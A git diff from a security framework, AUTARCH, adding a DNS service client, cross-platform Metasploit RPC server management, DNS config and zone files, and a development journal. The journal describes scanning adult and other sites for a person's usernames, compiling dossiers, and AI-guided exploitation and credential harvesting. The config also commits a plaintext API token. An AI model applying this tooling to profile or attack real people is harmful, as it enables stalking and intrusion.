urllib.request + url = f'{self.api_base}{endpoint}' + body = json.dumps(data).encode() if data else None + req = urllib.request.Request( + url, data=body, method=method, + headers={ + 'Authorization': f'Bearer {self.api_token}', + 'Content-Type': 'application/json', + }, + ) + with urllib.request.urlopen(req, timeout=5) as resp: + return json.loads(resp.read()) + + # ── High-level zone operations ─────────────────────────────────────── + + def list_zones(self) -> list: + return self._api_get('/api/zones').get('zones', []) + + def create_zone(self, domain: str) -> dict: + return self._api_post('/api/zones', {'domain': domain}) + + def get_zone(self, domain: str) -> dict: + return self._api_get(f'/api/zones/{domain}') + + def delete_zone(self, domain: str) -> dict: + return self._api_delete(f'/api/zones/{domain}') + + def list_records(self, domain: str) -> list: + return self._api_get(f'/api/zones/{domain}/records').get('records', []) + + def add_record(self, domain: str, rtype: str, name: str, value: str, + ttl: int = 300, priority: int = 0) -> dict: + return self._api_post(f'/api/zones/{domain}/records', { + 'type': rtype, 'name': name, 'value': value, + 'ttl': ttl, 'priority': priority, + }) + + def delete_record(self, domain: str, record_id: str) -> dict: + return self._api_delete(f'/api/zones/{domain}/records/{record_id}') + + def setup_mail_records(self, domain: str, mx_host: str = '', + dkim_key: str = '', spf_allow: str = '') -> dict: + return self._api_post(f'/api/zones/{domain}/mail-setup', { + 'mx_host': mx_host, 'dkim_key': dkim_key, 'spf_allow': spf_allow, + }) + + def enable_dnssec(self, domain: str) -> dict: + return self._api_post(f'/api/zones/{domain}/dnssec/enable') + + def disable_dnssec(self, domain: str) -> dict: + return self._api_post(f'/api/zones/{domain}/dnssec/disable') + + def get_metrics(self) -> dict: + return self._api_get('/api/metrics').get('metrics', {}) + + def get_config(self) -> dict: + return self._config.copy() + + def update_config(self, updates: dict) -> dict: + for k, v in updates.items(): + if k in self._config: + self._config[k] = v + self._save_config() + # Also update running service + try: + return self._api_put('/api/config', updates) + except Exception: + return {'ok': True, 'message': 'Config saved (service not running)'} + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_dns_service() -> DNSServiceManager: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = DNSServiceManager() + return _instance diff --git a/core/msf.py b/core/msf.py index 65e5c77..60a3661 100644 --- a/core/msf.py +++ b/core/msf.py @@ -538,38 +538,75 @@ class MSFManager: def _find_msfrpcd_pid(self) -> Optional[str]: """Find the PID of running msfrpcd process. + Works on both Linux (pgrep, /proc) and Windows (tasklist, wmic). + Returns: PID as string, or None if not found """ - try: - # Use pgrep to find msfrpcd - result = subprocess.run( - ['pgrep', '-f', 'msfrpcd'], - capture_output=True, - text=True, - timeout=5 - ) - if result.returncode == 0 and result.stdout.strip(): - # Return first PID found - pids = result.stdout.strip().split('\n') - return pids[0] if pids else None - except (subprocess.TimeoutExpired, FileNotFoundError): - pass + import sys + is_win = sys.platform == 'win32' - # Fallback: check /proc on Linux - try: - for pid_dir in os.listdir('/proc'): - if pid_dir.isdigit(): - try: - cmdline_path = f'/proc/{pid_dir}/cmdline' - with open(cmdline_path, 'r') as f: - cmdline = f.read() - if 'msfrpcd' in cmdline: - return pid_dir - except (IOError, PermissionError): - continue - except Exception: - pass + if is_win: + # Windows: use tasklist to find ruby/msfrpcd processes + for search_term in ['msfrpcd', 'thin', 'ruby']: + try: + result = subprocess.run( + ['tasklist', '/FI', f'IMAGENAME eq {search_term}*', + '/FO', 'CSV', '/NH'], + capture_output=True, text=True, timeout=5 + ) + if result.returncode == 0: + for line in result.stdout.strip().split('\n'): + line = line.strip().strip('"') + if line and 'INFO:' not in line: + parts = line.split('","') + if len(parts) >= 2: + return parts[1].strip('"') + except (subprocess.TimeoutExpired, FileNotFoundError): + pass + + # Fallback: wmic for command-line matching + try: + result = subprocess.run( + ['wmic', 'process', 'where', + "commandline like '%msfrpcd%' or commandline like '%thin%msf%'", + 'get', 'processid'], + capture_output=True, text=True, timeout=5 + ) + if result.returncode == 0: + for line in result.stdout.strip().split('\n'): + line = line.strip() + if line.isdigit(): + return line + except (subprocess.TimeoutExpired, FileNotFoundError): + pass + else: + # Linux: use pgrep + try: + result = subprocess.run( + ['pgrep', '-f', 'msfrpcd'], + capture_output=True, text=True, timeout=5 + ) + if result.returncode == 0 and result.stdout.strip(): + pids = result.stdout.strip().split('\n') + return pids[0] if pids else None + except (subprocess.TimeoutExpired, FileNotFoundError): + pass + + # Fallback: check /proc on Linux + try: + for pid_dir in os.listdir('/proc'): + if pid_dir.isdigit(): + try: + cmdline_path = f'/proc/{pid_dir}/cmdline' + with open(cmdline_path, 'r') as f: + cmdline = f.read() + if 'msfrpcd' in cmdline: + return pid_dir + except (IOError, PermissionError): + continue + except Exception: + pass return None @@ -577,11 +614,15 @@ class MSFManager: """Kill any running msfrpcd server. Args: - use_sudo: Use sudo for killing (needed if server was started with sudo) + use_sudo: Use sudo for killing (needed if server was started with sudo). + Ignored on Windows. Returns: True if server was killed or no server was running """ + import sys + is_win = sys.platform == 'win32' + is_running, pid = self.detect_server() if not is_running: @@ -591,77 +632,168 @@ class MSFManager: if self.is_connected: self.disconnect() - # Kill the process - if pid: - try: - # Try without sudo first - os.kill(int(pid), signal.SIGTERM) - # Wait a bit for graceful shutdown - time.sleep(1) - - # Check if still running, force kill if needed + if is_win: + # Windows: use taskkill + if pid: try: - os.kill(int(pid), 0) # Check if process exists - os.kill(int(pid), signal.SIGKILL) - time.sleep(0.5) - except ProcessLookupError: - pass # Process already dead + subprocess.run( + ['taskkill', '/F', '/PID', str(pid)], + capture_output=True, timeout=10 + ) + time.sleep(1) + return True + except Exception as e: + print(f"{Colors.RED}[X] Failed to kill msfrpcd (PID {pid}): {e}{Colors.RESET}") - return True - except PermissionError: - # Process owned by root, need sudo - if use_sudo: - try: - subprocess.run(['sudo', 'kill', '-TERM', str(pid)], timeout=5) - time.sleep(1) - # Check if still running - try: - os.kill(int(pid), 0) - subprocess.run(['sudo', 'kill', '-KILL', str(pid)], timeout=5) - except ProcessLookupError: - pass - return True - except Exception as e: - print(f"{Colors.RED}[X] Failed to kill msfrpcd with sudo (PID {pid}): {e}{Colors.RESET}") - return False - else: - print(f"{Colors.RED}[X] Failed to kill msfrpcd (PID {pid}): Permission denied{Colors.RESET}") - return False - except ProcessLookupError: - return True # Already dead - - # Try pkill as fallback (with sudo if needed) - try: - if use_sudo: - subprocess.run(['sudo', 'pkill', '-f', 'msfrpcd'], timeout=5) - else: - subprocess.run(['pkill', '-f', 'msfrpcd'], timeout=5) + # Fallback: kill by image name + for name in ['msfrpcd', 'ruby', 'thin']: + try: + subprocess.run( + ['taskkill', '/F', '/IM', f'{name}.exe'], + capture_output=True, timeout=5 + ) + except Exception: + pass time.sleep(1) return True - except Exception: - pass + else: + # Linux: kill by PID or pkill + if pid: + try: + os.kill(int(pid), signal.SIGTERM) + time.sleep(1) + try: + os.kill(int(pid), 0) + os.kill(int(pid), signal.SIGKILL) + time.sleep(0.5) + except ProcessLookupError: + pass + return True + except PermissionError: + if use_sudo: + try: + subprocess.run(['sudo', 'kill', '-TERM', str(pid)], timeout=5) + time.sleep(1) + try: + os.kill(int(pid), 0) + subprocess.run(['sudo', 'kill', '-KILL', str(pid)], timeout=5) + except ProcessLookupError: + pass + return True + except Exception as e: + print(f"{Colors.RED}[X] Failed to kill msfrpcd with sudo (PID {pid}): {e}{Colors.RESET}") + return False + else: + print(f"{Colors.RED}[X] Failed to kill msfrpcd (PID {pid}): Permission denied{Colors.RESET}") + return False + except ProcessLookupError: + return True + + # Try pkill as fallback + try: + if use_sudo: + subprocess.run(['sudo', 'pkill', '-f', 'msfrpcd'], timeout=5) + else: + subprocess.run(['pkill', '-f', 'msfrpcd'], timeout=5) + time.sleep(1) + return True + except Exception: + pass return False + def _find_msf_install(self) -> Optional[str]: + """Find the Metasploit Framework installation directory. + + Returns: + Path to the MSF install directory, or None if not found. + """ + import sys + is_win = sys.platform == 'win32' + + if is_win: + # Common Windows Metasploit install paths + candidates = [ + os.path.join(os.environ.get('ProgramFiles', r'C:\Program Files'), 'Metasploit'), + os.path.join(os.environ.get('ProgramFiles(x86)', r'C:\Program Files (x86)'), 'Metasploit'), + r'C:\metasploit-framework', + os.path.join(os.environ.get('LOCALAPPDATA', ''), 'Metasploit'), + os.path.join(os.environ.get('ProgramFiles', ''), 'Rapid7', 'Metasploit'), + ] + for c in candidates: + if c and os.path.isdir(c): + return c + # Also check with -framework suffix + cf = c + '-framework' if not c.endswith('-framework') else c + if cf and os.path.isdir(cf): + return cf + else: + candidates = [ + '/opt/metasploit-framework', + '/usr/share/metasploit-framework', + '/opt/metasploit', + os.path.expanduser('~/.msf4'), + ] + for c in candidates: + if os.path.isdir(c): + return c + + return None + def start_server(self, username: str, password: str, host: str = "127.0.0.1", port: int = 55553, use_ssl: bool = True, use_sudo: bool = True) -> bool: """Start the msfrpcd server with given credentials. + Works on both Linux and Windows. + Args: username: RPC username password: RPC password host: Host to bind to port: Port to listen on use_ssl: Whether to use SSL - use_sudo: Run msfrpcd with sudo (required for raw socket modules like SYN scan) + use_sudo: Run msfrpcd with sudo (Linux only; ignored on Windows) Returns: True if server started successfully """ - # Build msfrpcd command + import sys + is_win = sys.platform == 'win32' + + # Find msfrpcd binary from core.paths import find_tool - msfrpcd_bin = find_tool('msfrpcd') or 'msfrpcd' + msfrpcd_bin = find_tool('msfrpcd') + + if not msfrpcd_bin and is_win: + # Windows: look for msfrpcd.bat in common locations + msf_dir = self._find_msf_install() + if msf_dir: + for candidate in [ + os.path.join(msf_dir, 'bin', 'msfrpcd.bat'), + os.path.join(msf_dir, 'bin', 'msfrpcd'), + os.path.join(msf_dir, 'msfrpcd.bat'), + os.path.join(msf_dir, 'embedded', 'bin', 'ruby.exe'), + ]: + if os.path.isfile(candidate): + msfrpcd_bin = candidate + break + + if not msfrpcd_bin: + # Try PATH with .bat extension + for ext in ['.bat', '.cmd', '.exe', '']: + for p in os.environ.get('PATH', '').split(os.pathsep): + candidate = os.path.join(p, f'msfrpcd{ext}') + if os.path.isfile(candidate): + msfrpcd_bin = candidate + break + if msfrpcd_bin: + break + + if not msfrpcd_bin: + msfrpcd_bin = 'msfrpcd' # Last resort: hope it's on PATH + + # Build command cmd = [ msfrpcd_bin, '-U', username, @@ -674,21 +806,32 @@ class MSFManager: if not use_ssl: cmd.append('-S') # Disable SSL - # Prepend sudo if requested - if use_sudo: + # On Windows, if it's a .bat file, run through cmd + if is_win and msfrpcd_bin.endswith('.bat'): + cmd = ['cmd', '/c'] + cmd + + # Prepend sudo on Linux if requested + if not is_win and use_sudo: cmd = ['sudo'] + cmd try: # Start msfrpcd in background - self._server_process = subprocess.Popen( - cmd, - stdout=subprocess.DEVNULL, - stderr=subprocess.DEVNULL, - start_new_session=True # Detach from our process group - ) + popen_kwargs = { + 'stdout': subprocess.DEVNULL, + 'stderr': subprocess.DEVNULL, + } + if is_win: + popen_kwargs['creationflags'] = ( + subprocess.CREATE_NEW_PROCESS_GROUP | + subprocess.CREATE_NO_WINDOW + ) + else: + popen_kwargs['start_new_session'] = True + + self._server_process = subprocess.Popen(cmd, **popen_kwargs) # Wait for server to start (check port becomes available) - max_wait = 30 # seconds + max_wait = 30 start_time = time.time() port_open = False @@ -712,9 +855,8 @@ class MSFManager: return False # Port is open, but server needs time to initialize RPC layer - # msfrpcd can take 5-10 seconds to fully initialize on some systems print(f"{Colors.DIM} Waiting for RPC initialization...{Colors.RESET}") - time.sleep(5) # Give server time to fully initialize + time.sleep(5) # Try a test connection to verify server is really ready for attempt in range(10): @@ -726,7 +868,7 @@ class MSFManager: test_rpc.connect(password) test_rpc.disconnect() return True - except MSFError as e: + except MSFError: if attempt < 9: time.sleep(2) continue @@ -735,8 +877,6 @@ class MSFManager: time.sleep(2) continue - # Server started but auth still failing - return true anyway - # The server IS running, caller can retry connection print(f"{Colors.YELLOW}[!] Server running but authentication not ready - try connecting manually{Colors.RESET}") return True diff --git a/data/dns/config.json b/data/dns/config.json new file mode 100644 index 0000000..8890b1a --- /dev/null +++ b/data/dns/config.json @@ -0,0 +1,10 @@ +{ + "listen_dns": "10.0.0.56:53", + "listen_api": "127.0.0.1:5380", + "api_token": "5ed79350fed2490d2aca6f3b29776365", + "upstream": [], + "cache_ttl": 300, + "zones_dir": "C:\\she\\autarch\\data\\dns\\zones", + "dnssec_keys_dir": "C:\\she\\autarch\\data\\dns\\keys", + "log_queries": true +} \ No newline at end of file diff --git a/data/dns/zones/autarch.local.json b/data/dns/zones/autarch.local.json new file mode 100644 index 0000000..75043cb --- /dev/null +++ b/data/dns/zones/autarch.local.json @@ -0,0 +1,53 @@ +{ + "domain": "autarch.local", + "soa": { + "primary_ns": "ns1.autarch.local", + "admin_email": "admin.autarch.local", + "serial": 1772537115, + "refresh": 3600, + "retry": 600, + "expire": 86400, + "min_ttl": 300 + }, + "records": [ + { + "id": "ns1", + "type": "NS", + "name": "autarch.local.", + "value": "ns1.autarch.local.", + "ttl": 3600 + }, + { + "id": "mx1", + "type": "MX", + "name": "autarch.local.", + "value": "mx.autarch.local.", + "ttl": 3600, + "priority": 10 + }, + { + "id": "spf1", + "type": "TXT", + "name": "autarch.local.", + "value": "v=spf1 ip4:127.0.0.1 -all", + "ttl": 3600 + }, + { + "id": "dmarc1", + "type": "TXT", + "name": "_dmarc.autarch.local.", + "value": "v=DMARC1; p=none; rua=mailto:dmarc@autarch.local", + "ttl": 3600 + }, + { + "id": "r1772537722879235900", + "type": "A", + "name": "https://autarch.local", + "value": "10.0.0.56:8181", + "ttl": 300 + } + ], + "dnssec": true, + "created_at": "2026-03-03T11:25:07Z", + "updated_at": "2026-03-03T12:24:00Z" +} \ No newline at end of file diff --git a/devjournal.md b/devjournal.md new file mode 100644 index 0000000..d779381 --- /dev/null +++ b/devjournal.md @@ -0,0 +1,2413 @@ +# AUTARCH Development Journal +## Project: darkHal Security Group - Project AUTARCH + +A condensed development journal covering all work on the AUTARCH framework. +For full implementation details, see `DEVLOG.md`. + +--- + +## Session 1 - 2026-01-14: Framework Foundation + +Built the entire AUTARCH framework from scratch in a single session. + +### Core Framework + +- **autarch.py** - Main entry point with full argparse CLI (--help, --module, --list, --setup, etc.) +- **core/banner.py** - ASCII art banner with ANSI color support +- **core/config.py** - Configuration handler for `autarch_settings.conf` with typed getters +- **core/menu.py** - Category-based main menu system (Defense/Offense/Counter/Analyze/OSINT/Simulate) +- **core/llm.py** - llama-cpp-python wrapper with ChatML format, streaming, chat history management +- **core/agent.py** - Autonomous agent loop with THOUGHT/ACTION/PARAMS structured response parsing +- **core/tools.py** - Tool registry with 12+ built-in tools (shell, file ops, MSF tools) +- **core/msf.py** - Metasploit RPC client (msgpack protocol) with module search/execution/session management +- **modules/setup.py** - First-run setup wizard for llama.cpp parameters +- **modules/chat.py** - Interactive LLM chat interface with slash commands +- **modules/agent.py** - Agent task interface +- **modules/msf.py** - Menu-driven MSF interface with quick scan presets + +### Category Modules + +- **modules/defender.py** (defense) - System hardening audit, firewall/SSH/permissions checks, security scoring +- **modules/counter.py** (counter) - Threat detection: suspicious processes, network analysis, rootkit checks +- **modules/analyze.py** (analyze) - File forensics: metadata, hashes, strings, hex dump, log analysis +- **modules/recon.py** (osint) - OSINT reconnaissance: email/username/phone/domain/IP lookup, social-analyzer integration +- **modules/simulate.py** (simulate) - Attack simulation: port scanner, password audit, payload generator +- **modules/adultscan.py** (osint) - Adult site username scanner (50+ sites) with custom site management, auto-detect URL patterns, bulk import from file + +### CLI System + +Full argparse with direct module execution (`-m`), quick commands (`osint `, `scan `), category listing, config display. + +### Architecture Decisions + +- Modules define NAME, DESCRIPTION, AUTHOR, VERSION, CATEGORY attributes with a `run()` entry point +- ChatML format (`<|im_start|>role\ncontent<|im_end|>`) for LLM compatibility +- Agent uses lower temperature (0.3) for tool selection accuracy +- MSF RPC requires msfrpcd running separately + +--- + +## Session 2 - 2026-01-15: CVE Database & OSINT Expansion + +### CVE Database System + +- **core/cve.py** - Full NVD API v2.0 integration with SQLite storage + - Auto OS detection with CPE mapping (15+ operating systems) + - Thread-safe SQLite with indexed columns + - Rate-limited API sync (respects NVD limits) + - Online fallback when database empty +- **modules/mysystem.py** (defense) - "My System" comprehensive audit + - 10 security checks (firewall, SSH, ports, users, permissions, services, updates, fail2ban, AV, CVEs) + - Security score 0-100 with severity-based penalties + - Per-issue remediation: manual instructions or LLM auto-fix + - Persists audit results to `system.inf` + +### Settings Menu Expansion + +- CVE Database Settings (sync, API key, stats) +- Custom APIs management (add/edit/delete external API integrations) +- AUTARCH API placeholder (future REST API) + +### OSINT Sites Database Expansion + +- **core/sites_db.py** - SQLite-backed sites database + - Added reveal-my-name source (628 sites) + - Added 43 XenForo/vBulletin forums from large forums list + - Added 60+ adult/NSFW sites (cam, creator, tube, dating, gaming, hentai, furry) + - Added mainstream sites (social, dating, crypto, streaming, creative, shopping, blogging) + - Decoded and imported Snoop Project database (base32-encoded, reversed format) - 4,641 sites + - **Total: 8,315 sites across 9 sources** +- **modules/snoop_decoder.py** - Snoop database decoder module for OSINT menu + +### New OSINT Modules (Snoop-inspired features) + +- **modules/geoip.py** - GEO IP/domain lookup (ipwho.is, ipinfo.io backends) +- **modules/yandex_osint.py** - Yandex user account intelligence gathering +- **modules/nettest.py** - Network connectivity and speed testing +- **core/report_generator.py** - HTML report generator with dark theme AUTARCH branding + +--- + +## Session 3 - 2026-01-15 (Continued): OSINT Quality Improvements + +### Configurable OSINT Settings + +- Added `[osint]` config section: `max_threads` (default 8), `timeout`, `include_nsfw` +- OSINT Settings submenu in Settings menu +- Both recon.py and adultscan.py use config instead of hardcoded values + +### Database Cleanup + +- Fixed 3,171 malformed site names (`{username}.domain` patterns, `Forum_name` patterns) +- Removed 407 duplicate forum software variants (`_vb1`, `_xf`, `_phpbb`) +- Added `cleanup_garbage_sites()` - disabled Russian forum farms (ucoz, borda, etc.), search URLs, dead sites +- Added `auto_categorize()` - pattern-based categorization reducing "other" from 82% to 42% +- Added `remove_duplicates()` - removed duplicate URL templates +- **Result: 7,119 total sites, 4,786 enabled (quality over quantity)** + +### Detection System Rewrite (Social-Analyzer Style) + +- Rewrote detection to mirror social-analyzer's approach: + - `return: true/false` string matching patterns + - Rate calculation: `(detections_passed / detections_total) * 100` + - Status categories: good (100%), maybe (50-100%), bad (<50%) +- Added WAF/Cloudflare detection (actual challenge pages only, not all CDN-served content) +- Added random delays (50-500ms) to reduce rate limiting +- Added retry logic (up to 2 retries for 5xx/connection failures) +- Expanded to 30 NOT_FOUND patterns and 23 FOUND patterns + +### Blackbird Import + +- Added `import_from_blackbird()` to sites_db.py +- Imported 168 new sites from blackbird's wmn-data.json +- Name collision handling with `_bb` suffix +- **Final total: 7,287 sites across 10 sources** + +--- + +## Session 4 - 2026-01-15 (Continued): Dossier Manager & Agent Hal + +### Dossier Manager + +- **modules/dossier.py** - OSINT investigation management + - Create dossiers linking multiple identifiers (emails, usernames, phones, names, aliases) + - Import username scan results from JSON + - Manual profile addition, investigation notes + - Export as JSON or text report + - Storage in `dossiers/` directory + +### NSFW / Adult Site Fixes + +- Fixed Chaturbate URL format (added trailing slash) +- Added fanfiction sites from pred_site.txt (AO3, Fimfiction, FanFiction.net, Kemono) +- Fixed imgsrc.ru categorization (adult, nsfw=1) +- Added `SITE_COOKIES` dictionary with age verification cookies for 25+ adult sites +- Fixed overly aggressive WAF detection (Cloudflare-served != WAF-blocked) + +### Agent Hal Module + +- **modules/agent_hal.py** v1.0 - AI-powered security automation + - **Defense: MITM Detection** + - ARP spoofing, DNS spoofing, SSL stripping, rogue DHCP, gateway anomaly detection + - Continuous monitoring mode (5-second interval ARP table comparison) + - **Offense: MSF Automation (AI)** + - Natural language MSF control (user describes intent, LLM recommends modules) + - Quick scan target (multi-scanner automation) + - Exploit suggester (LLM-powered, with CVE numbers and success likelihood) + - Post-exploitation helper (privesc, persistence, credential harvesting guidance) +- Added to main menu as option [7] Agent Hal + +--- + +## Session 5 - 2026-01-19: Username Scanner Refinement + +### CupidCr4wl-Style Detection + +- Rewrote detection algorithm based on CupidCr4wl's dual pattern matching: + - `not_found_text` match = user definitely doesn't exist (highest priority) + - `check_text` match + username in content = FOUND (good) + - `check_text` match only = POSSIBLE (maybe) + - Nothing matched = NOT FOUND + +### Site-Specific Detection Patterns + +- Added `SITE_PATTERNS` dictionary with tailored check_text/not_found_text for 20+ platforms: + - Reddit, GitHub, Twitter/X, Instagram, TikTok, Telegram, Tumblr + - Chaturbate, OnlyFans, Fansly, Pornhub, XVideos, Stripchat + - DeviantArt, ArtStation, Fur Affinity, e621 + - Twitch, Steam, FetLife, YouTube, Wattpad + +### Other Improvements + +- Username validation (length, invalid chars, email detection) +- User-Agent rotation (6 agents) +- Fixed gzip encoding bug (removed Accept-Encoding header) +- Updated detection patterns in sites.db via SQL for major sites +- Fixed Chaturbate "offline" false positive ("offline" != "not found" for cam sites) + +### Verification Results + +- torvalds (GitHub): good 100% - correctly detected +- spez (Reddit): good 100% - correctly detected +- fudnucker (Chaturbate): good 100% - correctly detected +- totally_fake_user_xyz (Chaturbate): NOT FOUND - correctly rejected + +--- + +## Session 6 - 2026-01-27: PentestGPT Methodology Integration + +### Overview + +Ported PentestGPT's three-module pipeline architecture (from the USENIX Security paper) into AUTARCH as native modules. This adds structured, AI-guided penetration testing capabilities to Agent Hal using the local LLM rather than external APIs. + +### Research Phase + +Studied PentestGPT's architecture: +- Three-module pipeline: Parsing, Reasoning, Generation +- Penetration Testing Tree (PTT) - hierarchical task tracker +- Session-based workflow with state persistence + +Studied AUTARCH's existing systems: +- core/llm.py (ChatML, chat(), clear_history(), streaming) +- core/tools.py (ToolRegistry, MSF tools, shell) +- modules/agent_hal.py (MITM detection, MSF automation) + +### Key Adaptation Decisions + +1. **Fresh context per module call** - PentestGPT uses 100K+ token cloud models with rolling conversations. AUTARCH's local LLM has 4096 token context. Solution: `clear_history()` before each pipeline stage, inject only compact tree summary. +2. **PTT as Python object** - PentestGPT keeps the tree as in-context text. AUTARCH stores it as a proper data structure with `render_summary()` for minimal token injection. +3. **Regex-based LLM parsing** - Local 7B models don't produce reliable JSON. All parsers use regex with fallbacks, matching existing agent_hal.py patterns. +4. **Manual-first execution** - Commands displayed for user to run manually. `exec` command enables auto-execution with per-command Y/n/skip confirmation. + +### New Files Created + +#### core/pentest_tree.py - Penetration Testing Tree + +The central PTT data structure from the USENIX paper. + +- `NodeStatus` enum: TODO, IN_PROGRESS, COMPLETED, NOT_APPLICABLE +- `PTTNodeType` enum: RECONNAISSANCE, INITIAL_ACCESS, PRIVILEGE_ESCALATION, LATERAL_MOVEMENT, CREDENTIAL_ACCESS, PERSISTENCE, CUSTOM +- `PTTNode` dataclass with id, label, type, status, parent/children, details, tool_output, findings, priority +- `PentestTree` class: + - Tree operations: add_node(), update_node(), delete_node() + - Queries: get_next_todo() (highest priority TODO), get_all_by_status(), find_node_by_label() + - `render_text()` - full tree for terminal display + - `render_summary()` - compact format for LLM context injection (critical for 4096 token window, shows only TODO/IN_PROGRESS nodes and last 5 findings) + - `initialize_standard_branches()` - creates MITRE ATT&CK-aligned top-level categories + - Serialization: to_dict() / from_dict() + +#### core/pentest_session.py - Session Management + +Save/resume pentest sessions with full state persistence. + +- `PentestSessionState` enum: IDLE, RUNNING, PAUSED, COMPLETED, ERROR +- `SessionEvent` dataclass for timeline logging +- `PentestSession` class: + - Lifecycle: start(), pause(), resume(), complete(), set_error() + - Persistence: save(), load_session(), list_sessions(), delete() + - Logging: log_event(), log_pipeline_result(), add_finding() + - export_report() - text summary report generation + - JSON files stored in `data/pentest_sessions/` + +#### core/pentest_pipeline.py - Three-Module Pipeline + +Implements PentestGPT's core architecture using AUTARCH's LLM.chat(). + +- `SOURCE_PATTERNS` - regex auto-detection for tool output type (nmap, msf_scan, msf_exploit, web, shell, gobuster, nikto) +- **ParsingModule** - normalizes raw tool output into structured SUMMARY/FINDINGS/STATUS + - Auto-detects source type via regex + - Chunks output >2000 chars + - Fresh clear_history() + chat() per call, temperature=0.2 + - Extracts [VULN] and [CRED] prefixed findings +- **ReasoningModule** - decides tree updates and selects next task + - Injects PTT render_summary() + parsed findings + - Produces TREE_UPDATES (ADD/COMPLETE/NOT_APPLICABLE) + NEXT_TASK + REASONING + - `_apply_updates()` resolves node IDs by label if exact ID not found + - Temperature=0.3 +- **GenerationModule** - converts abstract task into concrete commands + - Maps to AUTARCH tool names (msf_execute, msf_search, shell, etc.) + - Produces COMMANDS (TOOL/ARGS/EXPECT format) + FALLBACK + - Fallback detection for bare shell/MSF console commands + - Temperature=0.2 +- **PentestPipeline** - orchestrates all three modules + - process_output() - full parse->reason->generate flow + - get_initial_plan() - generates first tasks for new session + - inject_information() - incorporate external research + - discuss() - ad-hoc LLM questions without affecting tree + +### Modified Files + +#### core/config.py + +Added `[pentest]` section to DEFAULT_CONFIG: +``` +max_pipeline_steps = 50 +output_chunk_size = 2000 +auto_execute = false +save_raw_output = true +``` +Added `get_pentest_settings()` method. + +#### modules/agent_hal.py (v1.0 -> v2.0) + +Major expansion adding Pentest Pipeline as [3] under Offense. + +**New menu item:** +``` + Offense + [2] MSF Automation (AI) + [3] Pentest Pipeline (AI) <- NEW +``` + +**Pentest Pipeline Submenu:** +``` + [1] New Session + [2] Resume Session + [3] List Sessions + [4] Delete Session + [5] Show Session Tree +``` + +**Interactive Loop Commands:** +- `next` - paste tool output, runs full pipeline (parse->reason->generate) +- `exec` - auto-execute next action via MSF/shell with per-command Y/n/skip confirmation +- `discuss` - ad-hoc LLM question (doesn't affect tree) +- `google` - inject external research into pipeline +- `tree` - display current PTT +- `status` - session stats and recent findings +- `pause` - save and return to menu +- `done` - complete session and generate report + +**New methods:** +- pentest_pipeline_menu() +- _start_new_pentest_session(), _resume_pentest_session() +- _list_pentest_sessions(), _delete_pentest_session() +- _pentest_interactive_loop() +- _handle_next(), _handle_exec(), _handle_discuss(), _handle_google() +- _handle_status(), _handle_done() +- _execute_pipeline_action() - bridges pipeline output to shell/ToolRegistry + +### Pipeline Data Flow + +``` +User pastes tool output (or exec returns output) + -> ParsingModule: auto-detect source, chunk, LLM extracts SUMMARY/FINDINGS/STATUS + -> ReasoningModule: inject PTT summary + findings, LLM returns TREE_UPDATES + NEXT_TASK + -> GenerationModule: NEXT_TASK + target + tools -> LLM returns COMMANDS + FALLBACK + -> Display to user / auto-execute with confirmation + -> Session auto-saved after each cycle +``` + +### Verification + +All imports and basic tests passed: +- pentest_tree: PTT initializes with 6 MITRE ATT&CK branches, serialization round-trip OK +- pentest_session: Session lifecycle and JSON persistence OK +- pentest_pipeline: All three modules instantiate correctly +- config: pentest settings load with correct types and defaults +- agent_hal: Menu renders with new [3] Pentest Pipeline option + +--- + +## Current Project Structure + +``` +dh_framework/ +├── autarch.py # Main entry point with CLI +├── autarch_settings.conf # Configuration file +├── DEVLOG.md # Detailed development log +├── devjournal.md # This file +├── GUIDE.md # User guide +├── system.inf # System audit results +├── custom_adultsites.json # Custom adult sites +├── custom_sites.inf # Bulk import file +├── custom_apis.json # Custom API configurations +│ +├── core/ +│ ├── __init__.py +│ ├── agent.py # Autonomous agent loop +│ ├── banner.py # ASCII banner +│ ├── config.py # Configuration handler +│ ├── cve.py # CVE database (NVD API + SQLite) +│ ├── llm.py # LLM wrapper (llama-cpp-python) +│ ├── menu.py # Main menu system +│ ├── msf.py # Metasploit RPC client +│ ├── pentest_pipeline.py # PentestGPT three-module pipeline [NEW] +│ ├── pentest_session.py # Pentest session management [NEW] +│ ├── pentest_tree.py # Penetration Testing Tree [NEW] +│ ├── report_generator.py # HTML report generator +│ ├── sites_db.py # OSINT sites SQLite database +│ └── tools.py # Tool registry +│ +├── modules/ +│ ├── __init__.py +│ ├── adultscan.py # Adult site username scanner (osint) +│ ├── agent.py # Agent task interface (core) +│ ├── agent_hal.py # Agent Hal - AI automation (core) [UPDATED v2.0] +│ ├── analyze.py # File forensics (analyze) +│ ├── chat.py # LLM chat interface (core) +│ ├── counter.py # Threat detection (counter) +│ ├── defender.py # System hardening (defense) +│ ├── dossier.py # OSINT investigation manager (osint) +│ ├── geoip.py # GEO IP lookup (osint) +│ ├── msf.py # MSF interface (offense) +│ ├── mysystem.py # System audit with CVE (defense) +│ ├── nettest.py # Network testing (utility) +│ ├── recon.py # OSINT reconnaissance (osint) +│ ├── setup.py # First-run setup wizard +│ ├── simulate.py # Attack simulation (simulate) +│ ├── snoop_decoder.py # Snoop database decoder (osint) +│ └── yandex_osint.py # Yandex OSINT (osint) +│ +├── data/ +│ ├── cve/ +│ │ └── cve.db # SQLite CVE database +│ ├── pentest_sessions/ # Pentest session JSON files [NEW] +│ └── sites/ +│ ├── sites.db # OSINT sites database (7,287 sites) +│ └── snoop_full.json # Decoded Snoop database +│ +├── dossiers/ # Dossier JSON files +│ +└── results/ + └── reports/ # HTML reports and pentest reports +``` + +## Capability Summary + +| Category | Modules | Key Features | +|----------|---------|--------------| +| Defense | defender, mysystem | System audit, CVE detection, auto-fix, security scoring | +| Offense | msf, agent_hal | MSF automation, pentest pipeline (AI), MITM detection | +| Counter | counter | Threat scan, rootkit detection, anomaly detection | +| Analyze | analyze | File forensics, hashes, strings, log analysis | +| OSINT | recon, adultscan, dossier, geoip, yandex_osint, snoop_decoder | Username scan (7K+ sites), dossier management, GEO IP, Yandex | +| Simulate | simulate | Port scan, password audit, payload generation | +| Core | agent, chat, agent_hal | Autonomous agent, LLM chat, AI-powered automation | +| Utility | nettest | Network speed and connectivity testing | + +## Technology Stack + +- **Language**: Python 3 +- **LLM**: llama-cpp-python (local GGUF models), HuggingFace transformers (SafeTensors), Claude API +- **Databases**: SQLite (CVEs, sites), JSON (sessions, dossiers, configs) +- **Integrations**: Metasploit RPC (msgpack), NVD API v2.0, social-analyzer 